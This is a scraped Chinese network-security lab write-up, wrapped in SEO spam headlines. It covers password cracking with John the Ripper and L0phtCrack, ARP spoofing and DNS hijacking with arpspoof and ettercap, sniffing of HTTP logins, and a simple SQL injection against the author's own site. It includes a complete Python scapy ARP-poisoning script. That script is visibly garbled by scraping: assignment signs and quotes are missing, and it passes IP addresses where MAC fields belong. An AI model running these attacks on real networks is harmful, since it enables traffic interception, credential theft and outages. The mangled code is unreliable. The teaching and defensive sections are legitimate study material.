当前位置: 首页 > news >正文

最便宜的网站叫什么名字济南seo优化外包服务公司

最便宜的网站叫什么名字,济南seo优化外包服务公司,dw做的静态网站怎么分享链接,交互ui培训#x1f345; 点击文末小卡片 #xff0c;免费获取网络安全全套资料#xff0c;资料在手#xff0c;涨薪更快 网络安全实验3 前言Kali 常用指令工具教程 ettercap 基本使用 一、口令破解 John the ripper 破解 linux 密码l0phtcrack7 破解 windows 密码John 破解 zip 压…  点击文末小卡片 免费获取网络安全全套资料资料在手涨薪更快 网络安全实验3 前言Kali 常用指令工具教程 ettercap 基本使用 一、口令破解 John the ripper 破解 linux 密码l0phtcrack7 破解 windows 密码John 破解 zip 压缩包的密码 二、ARP 欺骗、DNS 劫持 arpspoof 实现 ARP 欺骗ettercap 进行 DNS 劫持ettercap 进行 ARP 欺骗HTTPHTTPS账号密码获取 三、Python 编写 arpspoof 环境准备ARP 报文结构编写代码测试脚本 四、SQL注入自己部署的网站 环境准备:SQL 注入简单了解开始实战SQL 注入的预防方法为什么预编译语句可以防SQL注入 VmVare 问题汇总 桥接模式没有网 安全贴士 如何知道自己是否被 ARP欺骗攻击了 前言 本人深感网络安全实验有点麻烦花了一个晚上弄了部分特此将笔记贡献造福后人个人能力有限还会继续更新。。。 汇报题目15分钟教你用 Python 写一个 arpspoof课件准备ing如果弄完后续补上 第一次网络安全实验密码学也是我做的这里先放个自制工具Java实现密码学工具集成了对称加密算法DESAESIDEA公开加密算法RSAECC散列算法MD5SHA1CRC32以及RSADSAECDSA数字签名验证示例。具体报告有时间上传一下。。 后续准备将工具教程与实战模块分离。。。 Kali 常用指令 切换系统语言: sudo dpkg-reconfigure locales 获取 root 权限sudo -s输入密码 查看 ip 地址ipconfig 查看网关地址route -n 查找文件lication xxx 放大命令行字体ctrl  shift   缩小命令行字体ctrl  - 恢复初始ctrl  0 工具教程 ettercap 基本使用 左上角搜索 ettercap选择 ettercap-graphical 打开软件 Ettercap 扫描局域网主机 进入 ettercao 后选择网卡 eth0其他的默认即可然后点击右上角的勾进入操作的主界面。 由于安装kali的版本不同Ettercap 界面可能有所不同不过操作都是大同小异的 Ettercap 扫描局域网主机 进入主操作界面后点击右上角的三个小点选择 Hosts-  Hosts list就会出现一个局域网所有主机的列表如果 主机列表为空 或是 有些局域网里的主机没有显示在列表里那么就可以对整个局域网进行主机扫描点击三个小点 - Hosts- Scan for hosts。扫描完成后主机列表就会刷新了。 Ettercap 伪造网关欺骗 主机列表中选中 网关IP 点击 Add to Target 1选择 需要攻击的目标主机IP 点击 Add to Target 2。 这一步主要是欺骗被攻击的目标主机把 网关的IP地址伪造成 攻击者 Mac 地址。让被攻击的目标主机 把数据发送到 攻击者的主机上。 进行 ARP 欺骗 完成上面步骤后接着点击小地球选择 ARP poisoning… 会弹出一个提示框让你选择直接勾选第一个选项点击OK最后一步点击左上角的三角型按钮进行启动。 ARP 欺骗启动后被攻击的目标主机数据请求就会自动发送到攻击者的主机上来。 一、口令破解 加密算法其实就是用明文密码和一个叫 salt 的东西通过函数crypt()完成加密。而所谓的密码域密文也是由三部分组成的即$id$salt$encrypted。 id 为 1 时采用 md5 进行加密id 为 5 时采用 SHA256 进行加密id 为 6 时采用 SHA512 进行加密 通过 cat /etc/shadow 可以观察到 John the ripper 破解 linux 密码 John the ripper 介绍 四种模式字典模式简单模式增强模式外挂模式Kali Linux 上的 John 随带的密码列表。它位于下面这个路径 /usr/share/john/password.lstjohn --wordlist/usr/share/john/password.lst [filename]john--show ~/file_to crack 把密码文件拷贝到用户目录下 cp /etc/shadow /home/yu/yusael 1. 破解密码文件 john --wordlist/usr/share/john/password.lst 1. 查看破解后的密码文件 john -show shadow 1. l0phtcrack7 破解 windows 密码 功能该工具支持远程破解理论上能破解所有密码但对复杂度比较高的密码破解时间很长 使用前提 登录了需要破解的计算机知道需要破解的计算机的一个管理员的账户密码 选择 Password Auditing Wizard 选择要破解的密码的计算机操作系统这里我们选择 Unix-like点击 next 选择需要获得密码的计算机是本机器还是远程机器我们选择 the local machine 本机 选择是用登录的账户还是其他管理员账户这里我们选择第一个登录的账户 选择密码爆破方式我们选择第一种快速破解当然也可以选择其他类型 选择报告方式默认即可 选择 Run this job immediately 立刻执行 点击 finish 破解结果成功破解出简单的密码 65535至于复杂的含有字母的密码难以破解快速模式下。 John 破解 zip 压缩包的密码 准备工具 zip压缩包带密码 1个kali Linux机器 1个 操作步骤 首先创建一个 hello.zip 压缩文件密码为 123321将他放到 Kali Linux 中 使用 zip2john 命令爆出 hash 文件zip2john hello.zip passwd.txt 然后使用 john 命令计算 hash 文件john passwd.txt成功破解出密码123321。 二、ARP 欺骗、DNS 劫持 arpspoof 实现 ARP 欺骗 ARP欺骗一种中间人攻击攻击者通过毒化受害者的 ARP 缓存将网关的 MAC 替换成攻击者的 MAC 于是攻击者的主机实际上就充当了受害主机的网关之后攻击者就可以截获受害者发出和接到的数据包从中获取账号密码、银行卡信息等也可以实现断网操作。 注我们可以通过在终端输入 arp -a 来查询 ARP 缓存为了防治 ARP 欺骗可以通过 arp -s IP MAC 绑定 IP 和 MAC 生成 静态 ARP 表项 实验环境 虚拟机 A使用 kali linux攻击者本地主机 Bwin10A 和 B 处于同一局域网这里的虚拟机需要以桥接的方式进行连接 桥接和 NAT 的区别 1、桥接和 NAT 都是虚拟机的一种通讯模式都需要一块网卡但在桥接模式下虚拟机和主机在同一网段而 NAT 模式下虚拟机和主机不在同一网段。 2、桥接网络相当于虚拟机和主机接在同一交换机上同时上网虚拟机对物理机的 CPU 和网络的直接影响较小但安全性较低。 3、NAT 相当于虚拟机通过物理机连接网络此时物理机相当于一个路由器虚拟机等同于申请到一个上网名额对物理机的 CPU 和网络的直接影响较大但安全性较高。 实验步骤 1、主机 B 里 ping www.baidu.com 检查网络 2、主机 B 里 ipconfig 查询主机 B 的 IP 地址 3、在 kali 的终端输入 route -n 查询当前局域网网关为192.168.3.1 4、arp 攻击指令格式arpspoof -i [网卡名称] -t [B的IP] [当前局域网网关] 在 kali 的终端里输入命令arpspoof -i eth0 -t 192.168.3.3 192.168.3.1 5、kali 中输入指令后回到主机 B此时已经被ARP攻击断网了。 命令行中ping www.baidu.com 测试网络连通发现请求超时。 ettercap 进行 DNS 劫持 ipconfig 查看 Kali Liunx 的 IP 地址我这里是 192.168.3.21 vi /etc/ettercap/etter.dns 修改 etter.dns 文件添加两行 * A 192.168.3.21 * PTR 192.168.3.21 1.2. 开启 apache2 服务 service apache2 start 1. 打开 ettercap ettercap -G 1. 点击扫描扫描到以后点击 Add to Target1、Add to Target2 标题栏上点击三个点选择 ARP poisoning... 选中 Sniff remote connections. 选择 dns_spoof即 DNS 劫持攻击。 点击左上角的开始按钮此时下面显示 Starting Unified sniffing... 便开始攻击了。 此时目标机就连不上“国际互联网”这里的目标机是我的Kali机子。 ettercap 进行 ARP 欺骗 Ettercap 扫描局域网主机 进入 ettercao 后选择网卡 eth0其他的默认即可然后点击右上角的勾进入操作的主界面。 由于安装kali的版本不同Ettercap 界面可能有所不同不过操作都是大同小异的 Ettercap 扫描局域网主机 进入主操作界面后点击右上角的三个小点选择 Hosts-  Hosts list就会出现一个局域网所有主机的列表如果 主机列表为空 或是 有些局域网里的主机没有显示在列表里那么就可以对整个局域网进行主机扫描点击三个小点 - Hosts- Scan for hosts。扫描完成后主机列表就会刷新了。 Ettercap 伪造网关欺骗 主机列表中选中 网关IP 点击 Add to Target 1选择 需要攻击的目标主机IP 点击 Add to Target 2。 这一步主要是欺骗被攻击的目标主机把 网关的IP地址伪造成 攻击者 Mac 地址。让被攻击的目标主机 把数据发送到 攻击者的主机上。 进行 ARP 欺骗 完成上面步骤后接着点击小地球选择 ARP poisoning… 会弹出一个提示框让你选择直接勾选第一个选项点击OK最后一步点击左上角的三角型按钮进行启动。 ARP 欺骗启动后被攻击的目标主机数据请求就会自动发送到攻击者的主机上来。 此时目标主机已经受到攻击。 通过 路由表 判断 是否被 ARP 欺骗ARP -n HTTPHTTPS账号密码获取 先开启端口转发保证正常上网echo 1 /proc/sys/net/ipv4/ip_forward 开始欺骗arpspoof -i eth0 -t 192.168.3.3 192.168.3.1 用 ettercap 抓取登入帐号密码ettercap -Tq -i eth0 修改中间人攻击的配置文件vim /etc/ettercap/etter.conf 三、Python 编写 arpspoof 环境准备 虚拟机的连接方式 NAT网络地址转换虚拟机可以上网但不能和物理机通信-----VMnet8host only主机模式虚拟机之间回可以通信与物理机不能通信-----VMnet1bridge (桥接答虚拟机与物理机在地位上相等相当于与物理机在同一局域网的物理机) Kali 如果没有 pip3 工具运行下面命令安装 pip3 apt install python3-pip 1. 安装 scapy 模块 pip3 insatall scapy 1. ARP 报文结构 以太网报文数据 硬件类型如以太网0x0001、分组无线网。协议类型如网际协议(IP)0x0800、IPv60x86DD。硬件地址长度每种硬件地址的字节长度一般为6以太网。协议地址长度每种协议地址的字节长度一般为4IPv4。 操作码1 为 ARP 请求2 为 ARP 应答3为RARP请求4为RARP应答。源硬件地址n个字节n由硬件地址长度得到一般为发送方MAC地址。源协议地址m个字节m由协议地址长度得到一般为发送方IP地址。目标硬件地址n个字节n由硬件地址长 度得到一般为目标MAC地址。目标协议地址m个字节m由协议地址长度得到一般为目标IP地址。 报文格式对我们来说只需要关心 操作码、源硬件地址、源协议地址、目标硬件地址、目标协议地址 CMD中 from scapy.all import * # 查看以太网报文 ls(Ether()) # 查看ARP报文 ls(ARP()) 编写代码 #-*- coding:utf-8 -*-from scapy.all import * from scapy.layers.l2 import ARP, getmacbyip import sys arp 缓冲表恢复def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):print([*] 恢复ARP缓冲...)send(ARP(op2, psrcgateway_ip, pdsttarget_ip,hwdstff:ff:ff:ff:ff:ff, hwsrcgateway_ip), count5)send(ARP(op2, psrctarget_ip, pdstgateway_ip,hwdstff:ff:ff:ff:ff:ff, hwsrctarget_mac)) 进行双向欺骗def attack_target(gateway_ip, gateway_mac, target_ip, target_mac):首先使用 scapy 构造 ARP包需要: 了解arp报文结构见笔记[以太网的首部]默认即可查看默认的以太网头部: ls(Ether())dst : DestMACField ff:ff:ff:ff:ff:ff (None)src : SourceMACField 00:0c:29:07:a4:fd (None)type : XShortEnumField 36864 (36864)[arp头部]默认即可需要了解操作码 源硬件地址 源协议地址 目标硬件地址 目标协议地址查看ARP报文 ls(ARP())hwtype : XShortField 1 (1)ptype : XShortEnumField 2048 (2048)hwlen : FieldLenField None (None)plen : FieldLenField None (None)op : ShortEnumField 1 (1) hwsrc : MultipleTypeField 00:0c:29:07:a4:fd (None)psrc : MultipleTypeField 192.168.3.21 (None)hwdst : MultipleTypeField 00:00:00:00:00:00 (None)pdst : MultipleTypeField 0.0.0.0 (None)我们关心的是以下几个属性:[op]: 操作码, 默认为 11为 ARP请求, 2为 ARP应答, 3为 RARP请求, 4为 RARP应答RARP —— 逆地址解析协议, 作用与 ARP 相反, 将 MAC 地址转换为 IP 地址。[hwsrc]: 发送方 MAC 地址, 用于告诉对方我的 MAC 地址是什么, 默认为本机, 可以忽略该属性hw —— hardware:硬件, src —— source:源, 也就是自己[psrc]: 发送方 IP 地址, 用于告诉对方我的 IP 地址是什么, 可以用来【伪装】下面两个属性决定报文发给谁[hwdst]: 目标 MAC 地址dst —— destination:目的地[pdst]: 目标 IP 地址# 欺骗目标主机, 我是网关发送给目标主机(target_ip)欺骗它:我的 IP 是 gateway_ip(我是网关)我的 MAC地址 是 hwsrc(默认本机)poison_target ARP() # 构造 ARP包poison_target.op 2 # ARP应答poison_target.psrc gateway_ip # 我的 IP 是 gateway_ip(我是网关)poison_target.pdst target_ip # 目标 IP 地址poison_target.hwdst target_mac # 目标 MAC 地址# 欺骗网关, 我是目标主机发送给网关(gateway_ip)欺骗它:我的 IP 是 target_ip(我是目标主机)我的 MAC地址 是 hwsrc(默认本机)poison_gateway ARP() # 构造 ARP包poison_gateway.op 2 # ARP应答poison_gateway.psrc target_ip # 我的 IP 是 target_ip(我是目标主机)poison_gateway.pdst gateway_ip # 目标 IP地址, 发送给网关poison_gateway.hwdst gateway_ip # 目标 MAC地址, 发送给网关print([*] 正在进行ARP投毒. [CTRL-C 停止])while True:try:# 不停的发送 ARP包 send(poison_target)send(poison_gateway)# 休眠一下, 避免太频繁的欺骗, 影响网络time.sleep(2)# 捕获键盘中断except KeyboardInterrupt:# 进行 ARP缓冲修复restore_target(gateway_ip, gateway_mac, target_ip, target_mac)breakprint([*] ARP投毒结束...)def main():# 网卡 (在kali上运行该脚本)interface eth0# 网关 gateway_ip 192.168.3.1# 目标ip# target_ip 192.168.3.3target_ip input(请输入你想攻击的IP地址: )# 设置网卡conf.iface interface# 关闭提示信息conf.verb 0print([*] 网卡: %s%interface )# 获取网关MACgateway_mac getmacbyip(gateway_ip)if gateway_mac is None:print([!] 获取网关MAC失败. Exiting...)sys.exit(0)else:print([*] 网关: %s MAC: %s%(gateway_ip, gateway_mac))# 获取目标主机MACtarget_mac getmacbyip(target_ip)if target_mac is None:print([!] 获取目标主机MAC失败. Exiting...)sys.exit(0)else:print([*] 目标主机: %s MAC: %s%(target_ip, target_mac))attack_target(gateway_ip, gateway_mac, target_ip, target_mac)if __name__ __main__:main() 测试脚本 Kali 运行脚本windows 作为靶机。 查看ip查看网关等操作 前面已经详细列出过这里不再重复了直接开始运行脚本测试。 输入命令Python3 arpspoof.py 运行脚本 此时在 windows 上 ping www.baidu.com成功断网了。 四、SQL注入自己部署的网站 环境准备: 首先我们在 windows 上部署了自己制作的网站Spring Boot 搭建然后开启了 TomcatJava 的 Web 服务器。 SQL 注入简单了解 主要是针对 SQL 语句的漏洞进行攻击下面举一个简单的例子 比如网站登录用户基本都是用以下语句去查询用户名和密码如果正确则登录成功否则失败。 下句中的 SQL 语句的密码是我随便写的必定是登录失败的。 SELECT * FROM t_user WHERE usernamezhenyu AND passwordxxxxxx; 1. 但是如果 SQL 语句是下面这样呢 SELECT * FROM t_user WHERE usernamezhenyu AND passwordxxxxxx OR 11; 1. 不法分子可以通过在密码中拼接SQL中的关键字来达到登录的效果这就是最简单的SQL注入原理。 但其实 SQL 注入的预防也是十分容易的后面会写到。 开始实战 首先在 windows 上运行 SpringBoot 项目服务器开始运行。 在 Kali Liunx 上通过 windows 的 IP 访问我们的网站 首先确认数据库中正确的密码 正确的用户名应该是zhenyu 正确的密码应该是123456 输入用户名zhenyu开始SQL注入 输入密码 12 or ‘1’ ‘1’ 明明密码不正确却可以登录进去! SQL 注入的预防方法 其实想要预防 SQL 注入是非常容易的尤其是从代码层面来讲可能只需要改动一行代码即可。 以下写法是具有被SQL注入的风险的 只需要改成如下代码即可SQL注入就会失效它的原理是预编译语句。 为什么预编译语句可以防SQL注入 预编译语句之所以能防止注入是因为它把单引号转义了变成了 这样一来就无法截断SQL语句进而无法拼接SQL语句 基本上没有办法注入了。 关于预编译语句了解即可大部分的项目开发中都建议直接使用它但是很多老项目没有使用预编译语句就导致了存在SQL注入风险的项目依旧很多。 以上演示的是最简单的SQL注入黑客们的智慧是无穷的通过简单的SQL语句的搭配即可想出SQL注入这样的攻击方案十分令人惊叹未来或许还有更多层出不穷的攻击会出现。 VmVare 问题汇总 桥接模式没有网 问题描述VMWare安装之后虚拟网络一直使用默认配置即 VMnet0 为 Bridged 模式VMnet1 为 Only-Host 模式VMnet8 为 NAT 模式。点击了虚拟网络编辑器(Virtual Network Editor) 恢复默认设置后vMnet0 不见了并且手动添加选择桥接模式后会报错没有未桥接的主机网络适配器无法将网络更改为桥接状态。 此问题导致 VMnet0 无法选择 bridge模式原因是 还原默认设置 按钮的 卸载组件-安装组件 过程删除了桥接服务使主机的网络网卡没能被成功识别。 解决方案 搜索 网络状态并点击进入 点击更改适配器选项 右键点击物理网卡选择属性比如我这里连接的是WIFi 检查是否安装并选中了 “VMWare Bridge protocol”如果没有请继续看下去 点击安装后选中服务点击添加 然后选择从磁盘安装跳出来一个界面选择浏览在VMvare根目录下找到 netbridge.inx文件 安装即可。 安装完毕后此时物理网卡-属性中应该有 “VMWare Bridge protocol” 选项打勾即可。 还需要启动 vmnet bridging 驱动管理员打开命令行net start vmnetbridge或者重启计算机自动开启。 安全贴士 如何知道自己是否被 ARP欺骗攻击了 在命令行窗口内输入 ARP -a 查看路由表如果发现你的网关的 Mac 地址和局域网内某台主机的 Mac 地址相同就说明你被欺骗了。 最后感谢每一个认真阅读我文章的人礼尚往来总是要有的虽然不是什么很值钱的东西如果你用得到的话可以直接拿走 上述所有都有配套的资料这些资料对于做【网络安全】的朋友来说应该是最全面最完整的备战仓库这个仓库也陪伴我走过了最艰难的路程希望也能帮助到你凡事要趁早特别是技术行业一定要提升技术功底。
http://www.dnsts.com.cn/news/76025.html

相关文章:

  • 微山做网站苏州网站怎么做
  • 成功英语网站微信网站建设和维护
  • 西安高端模板建站餐饮最有效的营销方案
  • 网站是怎样制作的北京最新进出京政策
  • 做网站作业博达站群网站建设教程
  • 如何设置网站关键字wordpress电商插件
  • 网站建设的一些名词建网站的详细步骤
  • 做网站的思想体会网易那个网站可以做字幕
  • 泉州市住房和城乡建设网站番禺做网站哪家好
  • 做个网站需要学会什么广州知名的网站建设公司
  • 网站建设速成做网站买域名就行了吗
  • 福州市连江县建设局网站网站建设公司对比分析报告
  • 旅游网站开发 结束语注册公司代理记账头像图片
  • 临沂网站设计做网站要坚持
  • 南浔区城乡建设局网站让别人做网站多久开始注册域名
  • 公司品牌官网建站多元国际二维码图片
  • 网站的产品上传图片网站制作成功案例
  • 竹妃怎么在公众号里做网站互动平台领手机
  • 最好记得网站域名南京建设网站公司
  • 易语言可以做网站后端淘宝网站的建设目标
  • 自己建立网站后怎么做淘客张家明做网站
  • 工商网站官网入口海口建设公司网站
  • 网站首页上海网站建设公司设计网页公司哪里好
  • 国外优秀的html5网站wordpress多站点demo
  • html5高端网站建设织梦模板下载wordpress 301 插件
  • 网站架构包括哪些我是怎么做网站架构的
  • 企业网站建设销售话术网页打不开但是微信和qq都可以上
  • 网站制作的服务机构做乡镇网站
  • 深圳商城网站开发什么网站可以做试卷
  • 手机网站制作明细报价表我的网站百度找不到了